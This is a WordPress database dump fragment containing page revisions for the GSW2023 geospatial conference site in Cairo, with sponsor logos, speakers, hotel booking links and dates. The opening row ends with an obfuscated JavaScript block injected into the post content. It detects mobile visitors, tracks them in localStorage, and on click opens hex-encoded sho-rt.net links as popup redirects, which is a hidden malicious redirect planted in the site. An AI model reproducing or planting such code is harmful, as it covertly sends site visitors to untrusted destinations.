_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 13:32:35','2023-06-09 13:32:35','',3066,'https://gsw2023.com/?p=4637',0,'revision','',0),
(4638,1,'2023-06-09 13:33:58','2023-06-09 13:33:58','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"40\" bg_override=\"ex-full\" 